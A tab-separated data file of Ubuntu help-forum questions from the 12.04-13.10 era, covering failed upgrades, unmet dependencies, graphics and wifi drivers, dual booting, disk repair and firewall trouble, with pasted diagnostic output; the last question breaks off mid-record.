363722	cant update 12.04	when the update icon popped up , it said : an error occurred , please run package manager from the right click menu or apt-get in a terminal to see whats wrong . the error message was : error : marking the upgrade ( e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . ) this usually means that your installed packages have unmet dependencies . what should i do ?
363724	poor graphic performance with xfce 12.04	i have just installed ubuntu 12.04 and then replaced unity with xfce the way described here . now the graphic performance are poor . the main two symptompts i see are 1 . the graphics of some program such as emacs update slowly ( i need to alt-tab to refresh the display ) 2 . pymol complaints there is not enough memory . another program i use to view memory has slow response . note that i used pymol previously on this machine and it functioned properly . i suspect this is an issue with the intel driver , but i do n't know how to test this . the machine i use have an intel i3 processor . i think it 's type is 310 or 330 . from what i gather , this is also the display adapter . how can i improve the performance ?
363726	upgrade from 13.04 to 13.10	ran full software update using software updater in 13.04 . when i ran software updater again , it is showing system is fully updated and no option is displayed for upgrading to 13.10 .
363727	after upgrade + 2 days later . no bios , no grub	i did my upgrade from ubuntu 12 to ubuntu 13 last friday night . saturday and sunday it worked not too bad ( except that the keyboard layout has changed ) . i restarted the laptop and all worked . then yesterday night i started the pc and again the keyboard layout issue . i restarted the pc and from then on , i only see a black screen . no bios , no grub ... nothing only black screen . i have a hp laptop with a ati radeon graphics . what can i now ? i ca n't login even by typing ctrl + alt + f1 or ctrl + alt + f2 .
363737	send mail from the terminal	i need to send continuous mails , say one every minute , for testing purposes from a server running postfix . with the mail command i can manually do it , although there is no specific option to trigger it to auto send mails .
363740	dsdt seems ok still can not control brightness ?	in windows i can change brightness but in ubuntu i am not able to . after looking here and there i thought why not get dsdt from windows and compare it with the one in ubuntu so as to locate any errors etc . i used the rweverthing tool in windows and saved as windsdt.aml . now i decompiled it using iasl in ubuntu to produce windsdt.dsl and diffed with dsdt.dsl of ubuntu . no difference except the name part . both dsls when compiled give excatly 1 error 6 warnings . so where is the problem now ? ? ? ? i also tried solutions like this but no luck . machine : sony vaio vpceh35en dual boot : win7 ( 64bit ) , ubuntu 12.04 ( 32 bit ) help ... . thanks .
363741	system-wide equalizer for ubuntu 13.10	is there any system-wide equalizer for ubuntu 13.10 ? . a few months ago i had 12.04 and used pusleaudio equalizer . but now it is not working for saucy and i tried the alsa equalizer but i do not see any results . i know that this question has been answered several times , but i have not found an answer for 13.10 .
363744	storage partition : mount point during installation or later ?	i recently installed ubuntu on my laptop . i decided to create a logical partition to store my big files ( music , videos , pictures ... ) somewhere else than the home folder , so i created this partition during the new ubuntu installation process in ext4 format , using the mount-point /data . i 'll later try to redirect my pictures , videos and documents from /home in this /data folder , using symbolic links . however , i just read an article that explains how to create a storage partition after ubuntu installation , using gparted to mount the unused space on a /mnt/storage folder ( for example ) . what 's the difference between these two methods , and what do you think is the best to follow ?
363746	login loop on default desktop	i am running an ubuntu 13.04 and i get a log in loop on the default desktop and if i log in on a lighter desktop desktop after a while am sent back to log in screen . i tried every solution that i fount on the internet and i still got nothing . i am new to ubuntu and am not sure for what i did . i can run only terminal mods . i ca n't access even the x session errors so i do n't know what to do . if you can provide me the right code to access it because i am not sure of the one that i used
363747	error while installing ubuntu 13.10	i have the same question as in this question . i installed ubuntu on an external hard drive using universal ubuntu installer . when i booted with this usb plugged in , it showed a purple screen and then this error : can not open root device `` null '' or unknown block 0,0 '' '' please append a correct root/boot option '' '' kernel panic- not syncing : vfs : unable to mount root fs unknown block- ( 0,0 ) '' . what might be the cause of this error ? i downloaded ubuntu-13.10-desktop-i386.iso from the official site . it can not be problem with architecture as suggested in this comment because , i used the same architecture .iso file to install ubuntu 13.04 . os : windows 8 without uefi firmware
363750	is it possible for bash autocomplete to work with scripts ?	basically , ive been tasked with getting bash autocomplete working hadoop , but /usr/bin/hdfs is a script that actually sets a path and then calls the actual hdfs `` binary '' . autocomplete works ( there is a bug in there but it works ) when calling /usr/lib/hadoop-hdfs/bin/hdfs directly . so is there something i am missing ? i have seen a wrapper script for aliases but it 's the same problem . the only solution i can think of outside complete is turning the script into a symlink for the binary and setting the variable globally . seems wrong doing that though !
363752	can i update ubuntu 13.10 from iso file in ubuntu itself ?	i downloaded ubuntu 13.10 file from internet , but ive to update ubuntu 13.04 without net connection can it be done using the iso file ?
363754	how can i set default applications in unity launcher for other users ?	so i 'm the first user on ubuntu 13.10 , and want to add other users as well . how can i change the default applications in unity launcher in a way that all new users will find my set of applications in the launcher , and not the default ones , like amazon , ubuntu one , or the libreoffice staff ?
363755	why are there two wifi indicators in the panel ?	i just installed ubuntu 13.10 en noticed that i have two indicators for wifi in my upper panel . in my 'panel ' ( where the clock is ) i can see the time , a little envelope , a battery , an icon to adjust the sound etc . and a symbol that shows me that i 'm connected to the internet . but , i have 2 of these icons side by side . a normal one and one with a lock on it .
363757	disabling global menu for specific application in saucy	there used to be a way to start an application with global menu disabled : is it possible to make indicator-appmenu ignore a specific application ? one needed to set the variable ubuntu_menuproxy . this method no longer works . are there any alternatives ?
363758	postfix+courier+mysql / sasl authentication error	today i 've installed postfix/courier with mysql authorisation/virtual users using this guide : https : //help.ubuntu.com/community/postfixcompletevirtualmailsystemhowto after a lot of searching and trying i found out that sasl does n't allow encrypted passwords in a mysql dbase . so you get an `` sasl authentication failure '' see : http : //ubuntuforums.org/archive/index.php/t-937596.html does anyone know a solution for this , i 'm not keen on having plain text passwords in my database !
363761	pointer is contrlled by keypad	i installed fresh ubuntu 13.10 and relaise that my pointer is controlled by key pad . i am not able to disable it . i want to replace it with activating my number pad . thanks in advance
363764	how to repair an external harddrive ?	i would like to reformat my hard disk , and if possible recover the ( somewhat unimportant ) contents if possible . i have a western digital 1tb hard drive which had a ntfs partition . i unplugged the drive without safely removing it first . at first a pop up was asking me to use a windows os to run the chkdsk /f command , however , in the effort to keep using a linux os i used the ntfsfix command on the ubuntu terminal now , when i try to access the hard drive , it does n't show up anymore in nautilus . i tried reformatting it using disk utility , but it gives me an error message , and gparted would hang on the `` scanning devices '' step infinitely . please comment any output that you would like to see and i will add it to my question . edit disk utility tells me is on /dev/sdb the command sudo fdisk -l gives dodohjk @ dodospc : ~ $ sudo fdisk -l [ sudo ] password for dodohjk : disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0006fa8c device boot start end blocks id system /dev/sda1 * 4094 482344959 241170433 5 extended /dev/sda2 482344960 488396799 3025920 82 linux swap / solaris /dev/sda5 4096 31461127 15728516 83 linux /dev/sda6 31463424 52434943 10485760 83 linux /dev/sda7 52436992 62923320 5243164+ 83 linux /dev/sda8 62924800 482344959 209710080 83 linux disk /dev/sdb : 1000.2 gb , 1000202043392 bytes 255 heads , 63 sectors/track , 121600 cylinders , total 1953519616 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x6e697373 this does n't look like a partition table probably you selected the wrong device . device boot start end blocks id system /dev/sdb1 ? 1936269394 3772285809 918008208 4f qnx4.x 3rd part /dev/sdb2 ? 1917848077 2462285169 272218546+ 73 unknown /dev/sdb3 ? 1818575915 2362751050 272087568 2b unknown /dev/sdb4 ? 2844524554 2844579527 27487 61 speedstor partition table entries are not in disk order i wrote something wrong here , however here the output of fsck /dev/sbd is dodohjk @ dodospc : ~ $ sudo fsck /dev/sdb fsck from util-linux 2.20.1 e2fsck 1.42.5 ( 29-jul-2012 ) ext2fs_open2 : bad magic number in super-block fsck.ext2 : superblock invalid , trying backup blocks ... fsck.ext2 : bad magic number in super-block while trying to open /dev/sdb the superblock could not be read or does not describe a correct ext2 filesystem . if the device is valid and it really contains an ext2 filesystem ( and not swap or ufs or something else ) , then the superblock is corrupt , and you might try running e2fsck with an alternate superblock : e2fsck -b 8193 < device & gt ;
363771	ubuntu 13.04 , wifi not detecting after restarting pc , after a weekly software updates installation	i am pretty new to ubuntu and been using it along with windows 7 since past few weeks . i manage to resolve all those preliminary issues with wifi adapter ( drivers and all ) after a fresh ubuntu installation . but today it asked for a software updates ( not 13.10 , just a regular update i believe ) . i updated and restarted my pc . since then its not showing any wifi connections at all . i checked in the additional drivers section in the software updates tab but its all empty . i have a d-link usb wifi adapter . the following command gives no output in the shell . sudo lshw -c network i remember it used to give some details about my network earlier , but its not showing anything at all . one more thing , the fifi usb adapter is working fine in windows 7 and also when booting it from ubuntu live usb . lsusb output : bus 001 device 002 : id 8087:8008 intel corp . bus 002 device 002 : id 8087:8000 intel corp . bus 003 device 002 : id 046d : c31d logitech , inc . bus 003 device 003 : id 046d : c05a logitech , inc. optical mouse m90 bus 003 device 004 : id 2001:3309 d-link corp. dwa-135 802.11n wireless n adapter ( rev.a1 ) [ realtek rtl8192cu ] bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub
363774	installation froze when installing 13.04 / dvd not booting anymore	hi everyone i keep reading the answers but cant find the right one . i got an old laptop i wanted to try ubuntu on and started the installation and choose to delete evrything since its a project laptop . it got stuck right after the choice of partition and froze . i let the computer running all night thinking it might be finished in the morning but it was still frozen . now the installation dvd dosent start up anymore and i only get the black screen with underscore and nothing else . is there another dvd to burn for fresh installation or a way to install 13.10 from scratch ?
363775	what is the use of nvidia-prime ?	yesterday , i was very excited about initial support for optimus using nvidia-prime package on ubuntu 13.10 . it seemed to be the way to replace my bumblebee + hybrid-screenclone configuration , since there is no patch available for the intel video driver that ships with ubuntu 13.10 . after hours of trials and errors , i only got a system where external and lcd displays randomly works or not , lcd screen flickers , window decorations are broken , and display randomly freeze . not really usable so far ... but now my question is : even if nvidia-prime was working as expected , why would i want to use it ? the reason optimus is there is to allow switching off discrete card when i do n't need it , to save on battery power . but with nvidia-prime , it seems discrete card is always powered . why someone would want to use an unstable optimus support that does n't save power ? the conclusion : if i need to save batteries and i do n't need external display , i just need to boot with display adapter set to integrated in the bios . if i need external display and i 'm connected on sector , i just need to boot with discrete display adapter . and if i need to boot in windows , i just need to put back the display adapter setting to optimus .
363776	ui font has rendering glitches in gnome shell	i do n't really know how to describe this problem in english . a picture can say more words - look at the tabs at the top of the linked image . the current font settings are shown as well . i do n't know what basic info i should provide so if something missing , please tell me . ubuntu 12.04 gnome shell 3.4.1 i know , a reboot can make everything normal but i 'm looking for a more permanent solution that can fix this problem ( or bug ) . update thanks for fitoschido , i finally know what keyword i could use for googling . i think it 's a bug of gnome shell . https : //bugs.archlinux.org/task/34847
363777	can i use the same external boot disk to use ubuntu on 2 different computers ?	i have yesterday ubuntu installed in my notebook , i was on windows when i installed this from a ubuntu cd image into my external hdd . so i got the disc with me in my work office , and i would like just to run ubuntu in this other computer just by running it from this external hdd . so my question is , how can i make this bootable from another notebook ( vgn-fz11z ) ? is that even possible ?
363780	dual boot windows 8 & ubuntu 13.10 - ubuntu wo n't boot after install	i just downloaded the ubuntu 13.10 iso file and burn the image to a dvd . i then installed it alongside windows 8 . now when i boot my computer up , it asks which os to boot , and windows 8 boots fine , but ubuntu comes up with an error . although the error says `` windows failed to start . '' i was trying to boot ubuntu . it loads fine from the dvd and i 've tried uninstalling it and reinstalling it , along with repairing it , but nothing seems to work . i always have the same exact error message with it . anyone have any ideas on what i need to do to fix this ? here 's what the error screen reads : windows failed to start . a recent hardware or software change might be the cause . to fix the problem : 1 . insert your windows installation disc and restart your computer . ( windows came preinstalled ) . 2 . choose your language settings , and then click `` next . '' 3 . click `` repair your computer . '' if you do not have this disc , contact your system administrator or computer manufacturer for assistance . file : \nst\autoneogrub0.mbr status : 0xc000007b info : the application or operating system could n't be loaded because the required file is missing or contains errors . like i said , windows boots perfectly fine , but when i try to boot ubuntu , it does n't work at all . i 'm just trying to figure out how to fix this problem so i can dual boot both os . thanks !
363782	crash during update from 13.04 to 13.10 , no desktop	i am dual booting windows 7 and ubuntu on my pc . i was in the middle of an upgrade from 13.04 to 13.10 with the software updater when my pc crashed , and now when i choose to boot into ubuntu , i get what looks like a terminal . what can i do to get ubuntu back into working order ? a hard drive format is out of the question . edit : i put in the wrong version numbers .
363783	dual boot windows 8 and ubuntu 13.04	i am using lenovo laptop and installed win8 64bit.i want to install ubuntu alongside win8 . i installed ubuntu13.04 but after i am getting the error that no root file system found . please tell me in detail how to install ubuntu 13.04 alongside win8 . i have disable uefi boot .
363785	issue with ubuntu software center	i was installing openfoam using a .deb file . during the installation i turned off my computer . when i restarted it , i saw that the software center was not opening . i got this error message : e : the package openfoam222 needs to be reinstalled , but i ca n't find an archive for it . i have also tried to open it using terminal . but failed . the terminal also shows this type of error : file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 243 , in open self._cache = apt.cache ( gtkmainiterationprogress ( ) ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 102 , in __init__ self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 146 , in open self._depcache = apt_pkg.depcache ( self._cache ) systemerror : e : the package openfoam222 needs to be reinstalled , but i ca n't find an archive for it . 2013-10-22 18:59:28,433 - softwarecenter.db.enquire - error - _get_estimate_nr_apps_and_nr_pkgs failed traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 115 , in _get_estimate_nr_apps_and_nr_pkgs tmp_matches = enquire.get_mset ( 0 , len ( self.db ) , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 263 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 176 , in < module > app.run ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1422 , in run self.show_available_packages ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1352 , in show_available_packages self.view_manager.set_active_view ( viewpages.available ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 154 , in set_active_view view_widget.init_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 171 , in init_view self.apps_filter ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 238 , in __init__ self.build ( desktopdir ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 511 , in build self._build_homepage_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 271 , in _build_homepage_view self._append_whats_new ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 450 , in _append_whats_new whats_new_cat = self._update_whats_new_content ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 439 , in _update_whats_new_content docs = whats_new_cat.get_documents ( self.db ) file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line 124 , in get_documents nonblocking_load=false ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 317 , in set_query self._blocking_perform_search ( ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 212 , in _blocking_perform_search matches = enquire.get_mset ( 0 , self.limit , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 263 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' please help .
363790	installing raid 5 on a pre-existing ubuntu server . installation 12.04	i have a ubuntu server with samba already set up and installed with a 1tb hdd . i am wanting to now install 3 more 1tb drives and create a raid array using raid 5 . i have found a lot of documentation about installing raid when installing and setting up ubuntu server for the first time . however , i am struggling to find anything on installing a raid 5 array on a system already installed an configured . can this be done , or does a clean install need to be done again ?
363791	how to resolve unmet dependencies error - in ubuntu 12.04.3 lts 64bit server edition	i 'm digging hard to find a solution to this problem for a couple of days in ubuntu 12.04.3 lts 64bit server edition , kindly advice how to proceed further . sudo apt-get update = > works fine sudo apt-get -f install , sudo apt-get autoremove , `sudo apt-get upgrade = > displays below error_message error_message reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : linux-image-generic-lts-quantal : depends : linux-image-3.5.0-41-generic but it is not installed e : unmet dependencies . try using -f. sudo apt-get clean | sudo apt-get autoclean = > does nothing please find the output of these commands , sudo dpkg -- configure -a setting up initramfs-tools ( 0.99ubuntu13.2 ) ... update-initramfs : deferring update ( trigger activated ) dpkg : dependency problems prevent configuration of linux-image-generic-lts-quantal : linux-image-generic-lts-quantal depends on linux-image-3.5.0-41-generic ; however : package linux-image-3.5.0-41-generic is not installed . dpkg : error processing linux-image-generic-lts-quantal ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic-lts-quantal : linux-generic-lts-quantal depends on linux-image-generic-lts-quantal ; however : package linux-image-generic-lts-quantal is not configured yet . dpkg : error processing linux-generic-lts-quantal ( -- configure ) : dependency problems - leaving unconfigured processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.5.0-39-generic gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.5.0-39-generic with 1. dpkg : error processing initramfs-tools ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : linux-image-generic-lts-quantal linux-generic-lts-quantal initramfs-tools sudo apt-get remove -- purge linux-image-generic-lts-quantal linux-generic-lts-quantal initramfs-tools displays the same error message stated above . sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : linux-image-3.5.0-42-generic linux-image-generic-lts-quantal suggested packages : fdutils linux-lts-quantal-doc-3.5.0 linux-lts-quantal-source-3.5.0 linux-lts-quantal-tools linux-headers-3.5.0-42-generic the following new packages will be installed : linux-image-3.5.0-42-generic the following packages will be upgraded : linux-image-generic-lts-quantal 1 upgraded , 1 newly installed , 0 to remove and 28 not upgraded . 3 not fully installed or removed . need to get 40.7 mb of archives . after this operation , 157 mb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //in.archive.ubuntu.com/ubuntu/ precise-security/main linux-image-3.5.0-42-generic amd64 3.5.0-42.65~precise1 [ 40.7 mb ] get:2 http : //in.archive.ubuntu.com/ubuntu/ precise-security/main linux-image-generic-lts-quantal amd64 3.5.0.42.48 [ 2,406 b ] fetched 40.7 mb in 2min 41s ( 252 kb/s ) ( reading database ... 191233 files and directories currently installed . ) unpacking linux-image-3.5.0-42-generic ( from ... /linux-image-3.5.0-42-generic_3.5.0-42.65~precise1_amd64.deb ) ... done . dpkg : error processing /var/cache/apt/archives/linux-image-3.5.0-42-generic_3.5.0-42.65~precise1_amd64.deb ( -- unpack ) : failed in write on buffer copy for backend dpkg-deb during `./boot/vmlinuz-3.5.0-42-generic ' : no space left on device no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.5.0-42-generic /boot/vmlinuz-3.5.0-42-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.5.0-42-generic /boot/vmlinuz-3.5.0-42-generic errors were encountered while processing : /var/cache/apt/archives/linux-image-3.5.0-42-generic_3.5.0-42.65~precise1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) cat /etc/apt/sources.list # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # official ubuntu repos # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ubuntu main repos deb http : //in.archive.ubuntu.com/ubuntu/ precise main restricted universe multiverse deb-src http : //in.archive.ubuntu.com/ubuntu/ precise main restricted universe multiverse # # # # # # ubuntu update repos deb http : //in.archive.ubuntu.com/ubuntu/ precise-security main restricted universe multiverse deb http : //in.archive.ubuntu.com/ubuntu/ precise-updates main restricted universe multiverse deb http : //in.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb-src http : //in.archive.ubuntu.com/ubuntu/ precise-security main restricted universe multiverse deb-src http : //in.archive.ubuntu.com/ubuntu/ precise-updates main restricted universe multiverse deb-src http : //in.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse please help ! ! ! !
363792	moving ubuntu parallels vm to vmware esxi ?	is it possible to move ubuntu parallels vm to vmware esxi ? if so how can do you do this . i have attempted to use the vmware converter but it does not even connect . i have tested the ssh connection using terminal but no luck .
363793	bash script to move files	i 'm a beginner and i need help . i 'm trying to make a script to move some files from one directory in another directory . before to create the script i tested the command and it was working : mv /path/to/source /path/to/destination after i 've made the script with nano : # ! bin/bash/ echo `` mv /path/to/source /path/to/destination '' i 've made the script executable with : chmod +x file and then executed as ./file but the following error appears : bash : ./move.sh : /bin/bash/ : bad interpreter : not a directory i tried and with sudo ./file and bash file but itâs not working . i 'm using ubuntu installed with virtualbox .
363794	ubuntu ca n't find it 's root folder anymore after renaming vg group	last week i extended a disk on a virtual machine . because this vm was deployed from a template ( in vmware ) , the name of the volume group was n't the same as the server name . i thought i could rename it without any problems . now this week i had to reboot that server . while booting it 's unable to find root folder because in the startup config it 's pointing to /dev/mapper/templateubuntu12-root , while it 's now /dev/mapper/lbd -- oth -- unw-os01-root because it ca n't find it 's rootfolder it 's falling back on initramfs . how do i fix this , either by renaming the vg to match what 's in the startup config , changing the startup config or other means . since i 'm in ( initramfs ) my commands are a bit limited .
363795	closing laptop lid suspends lubuntu , since upgrade	i recently upgraded my lubuntu from 13.04 to 13.10 . i have my xfce-power-manager set on the lock screen action on lid close , but closing the lid still suspends the laptop in 13.10 . how can i set it to lock the screen ?
363800	cant write in arabic after upgrading to ubuntu gnome 13.10	after installing ubuntu gnome 13.10 i found that i cant write in arabic after changing keyboard layout to arabic ( qwerty ) the language indicator idicates that used language is arabic but it keep writing english ! ! !
363802	permission to delete files	i am very new to ubuntu i installed apache and i got the directory /var/www but i cant delete anyhting in that directory . it says : you are not the owner now i assume i have to log in as root ? but how do i log in as root and what is the standard password for root ? also how can i just give my own user the same permissions ? again i have little knowledge about linux and ubuntu etc .
363804	install epson nx430 with 64 bit ubuntu 13.10	i used the printer set up in system settings and the drivers will not install . how can i get my printer to work without going back to 13.04 32 bit ( it worked in 13.04 ) ?
363807	unable to connect to wired internet in ubuntu 12.04 in my pc	i installed ubuntu 12.04 on my pc but i am unable to connect to internet ( wired ) , as i click on wired connection1 after some time `` wired network disconnected you are now offline '' is shown even the internet wire is connected .
363810	videocard problem , xrandr failure , multiple displays , screen resolution problem	yesterday i updated from ubuntu 13.04 to ubuntu 13.10 . had some problems with my gpu drivers , but after 12h of figuring out what was wrong and fixing it i found this solution : ubuntu 13.10 - black screen after login session as you can see in the link above , i deleted fglrx so i can use the radeon ( openscource ) drivers . now i can login again , but my screen resolution is default 1280x960 ( no xorg.conf file ) [ got 3 other ( lower ) resolutions to chose from ] i followed some posts like : http : //ubuntuforums.org/showthread.php ? t=1850578 after testing with the xorg.conf file i made managed to change my resolution to a maximum of 1400x1050 . it looked like me changes in the xorg.conf file did n't change much . probably because the message below . if i login with my xorg.conf file in the right place ( '/etc/x11/xorg.conf ' ) i get the message : could nog apply the stored configuration for monitorsnone of the selected modes were compatible with the possible modes : trying modes for crtc 380 crtc 380 : trying mode 1400x1050 @ 77hz with output at 1280x960 @ 0hz ( pass 0 ) crtc 380 : trying mode 1400x1050 @ 77hz with output at 1280x960 @ 0hz ( pass 1 ) now i was checking my xrandr command and the output of xrandr -q is : xrandr : failed to get size of gamma for output default screen 0 : minimum 1400 x 1050 , current 1400 x 1050 , maximum 1400 x 1050 default connected primary 1400x1050+0+0 0mm x 0mm 1400x1050 77.0* without xorg.conf : xrandr : failed to get size of gamma for output default screen 0 : minimum 640 x 480 , current 1280 x 960 , maximum 1280 x 1024 default connected primary 1280x960+0+0 0mm x 0mm 1280x1024 0.0 1280x960 0.0* 1024x768 0.0 800x600 0.0 640x480 0.0 when i run sudo lspci -v command it gives as output : ... 03:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] cayman pro [ radeon hd 6950 ] ( prog-if 00 [ vga controller ] ) subsystem : pc partner limited / sapphire technology device e182 flags : bus master , fast devsel , latency 0 , irq 10 memory at d0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at fbcc0000 ( 64-bit , non-prefetchable ) [ size=128k ] i/o ports at c000 [ size=256 ] expansion rom at fbca0000 [ disabled ] [ size=128k ] capabilities : [ 50 ] power management version 3 capabilities : [ 58 ] express legacy endpoint , msi 00 capabilities : [ a0 ] msi : enable- count=1/1 maskable- 64bit+ capabilities : [ 100 ] vendor specific information : id=0001 rev=1 len=010 capabilities : [ 150 ] advanced error reporting kernel modules : fglrx , radeon ... the info above is right , nothing wrong there it seems , my ubuntu detects my video-card but xrandr not ? my xorg.conf file is generated by sudo x -configure as in the forum post above . output of command sudo x :1 -configure : x.org x server 1.14.3 release date : 2013-09-12 x protocol version 11 , revision 0 build operating system : linux 3.2.0-37-generic x86_64 ubuntu current operating system : linux rood-pc2 3.5.0-21-generic # 32-ubuntu smp tue dec 11 18:51:59 utc 2012 x86_64 kernel command line : boot_image=/boot/vmlinuz-3.5.0-21-generic root=uuid=ce53e7f9-8d91-48bb-8a55-475ab75c8dfb ro quiet splash radeon.dpm=1 vt.handoff=7 build date : 15 october 2013 09:23:37am xorg-server 2:1.14.3-3ubuntu2 ( for technical support please see http : //www.ubuntu.com/support ) current version of pixman : 0.30.2 before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . ( == ) log file : `` /var/log/xorg.1.log '' , time : tue oct 22 16:08:31 2013 list of video drivers : savage ati modesetting openchrome radeon mga , nouveau , r128 , intel , sis , cirrus , neomagic , sisusb , tdfx , siliconmotion , mach64 , qxl , trident , vmware , s3 , fbdev , vesa ( ++ ) using config file : `` /home/ralph/xorg.conf.new '' ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' ( ii ) [ kms ] drm report modesetting is n't supported . number of created screens does not match number of detected devices . configuration failed . ( ee ) server terminated with error ( 2 ) . closing log file . if i use the file ( '/home/ralph/xorg.conf.new ' ) : http : //pastebin.com/mbejredl i do n't use /etc/x11/xorg.conf.d/ ... , should i ? i have 3 displays , all the same with a resolution of 1920x1080 . so my problem is that my computer mirrors the display and only runs on a resolution of 1400x1050 . ( that looks more like 1280x960 ) i want a to have my screens at 1950x1080 side by side . could anybody plz help my ?
363811	dell idrac keyboard does not work after ubuntu 13.04 to 13.10 upgrade	the upgrade failed and i can not type at the console . i tried booting from the 13.10 installation media and the keyboard does not work there as well . is there a known issue with the dell idrac and 13.10 ? i have used it with all previous versions to date . it is a dell r720
363812	ubuntu for nokia lumia 710	is it possible to install ubuntu on my nokia lumia 710 device at the moment ? i have not found any way or instructions how that could be done .
363813	after software update , website not accessible	i just applied a bunch of recommended updates this morning ( which seems to have upgraded the kernel to 3.8.0-32.47 ) , and suddenly i can not connect to the machine on port 80 ( http ) or 22 ( ssh ) . ping still works . in addition , my syslog and kern.log are filling up with messages like oct 22 10:43:27 mu kernel : [ 4041.036862 ] inbound in=eth0 out= mac=6c:62:6d : c8 : b0 : d3:18:03:73:34:81 : b8:08:00 src=192.168.212.43 dst=192.168.212.56 len=48 tos=0x00 prec=0x00 ttl=128 id=17389 df proto=tcp spt=59502 dpt=80 window=8192 res=0x00 syn urgp=0 i can connect to the web server locally , so this smells like a firewall issue to me . i 've tried : doing `` reset firewall '' from inside gufw doing `` sudo ufw allow 80 '' and `` sudo ufw allow 22 '' from the command line and that is not working . so i went and looked at `` sudo iptables -l '' , and i 'm getting this , but i do n't understand the output ( i have hidden my employer 's domain with `` example.com '' ) chain input ( policy accept ) target prot opt source destination accept tcp -- ad1.example.com anywhere tcpflags : ! fin , syn , rst , ack/syn accept udp -- ad1.example.com anywhere accept tcp -- ad2.example.com anywhere tcpflags : ! fin , syn , rst , ack/syn accept udp -- ad2.example.com anywhere accept tcp -- ad3.example.com anywhere tcpflags : ! fin , syn , rst , ack/syn accept udp -- ad3.example.com anywhere accept all -- anywhere anywhere accept icmp -- anywhere anywhere limit : avg 10/sec burst 5 drop all -- anywhere 255.255.255.255 drop all -- anywhere 192.168.212.255 drop all -- base-address.mcast.net/8 anywhere drop all -- anywhere base-address.mcast.net/8 drop all -- 255.255.255.255 anywhere drop all -- anywhere 0.0.0.0 drop all -- anywhere anywhere state invalid lsi all -f anywhere anywhere limit : avg 10/min burst 5 inbound all -- anywhere anywhere log_filter all -- anywhere anywhere log all -- anywhere anywhere log level info prefix `` unknown input '' accept tcp -- anywhere anywhere tcp dpt : http ufw-before-logging-input all -- anywhere anywhere ufw-before-input all -- anywhere anywhere ufw-after-input all -- anywhere anywhere ufw-after-logging-input all -- anywhere anywhere ufw-reject-input all -- anywhere anywhere ufw-track-input all -- anywhere anywhere accept tcp -- anywhere anywhere tcp dpt : http any idea what i 've done wrong ? or how to fix it ? ( i think i 'm about to learn a lot about iptables . ) update 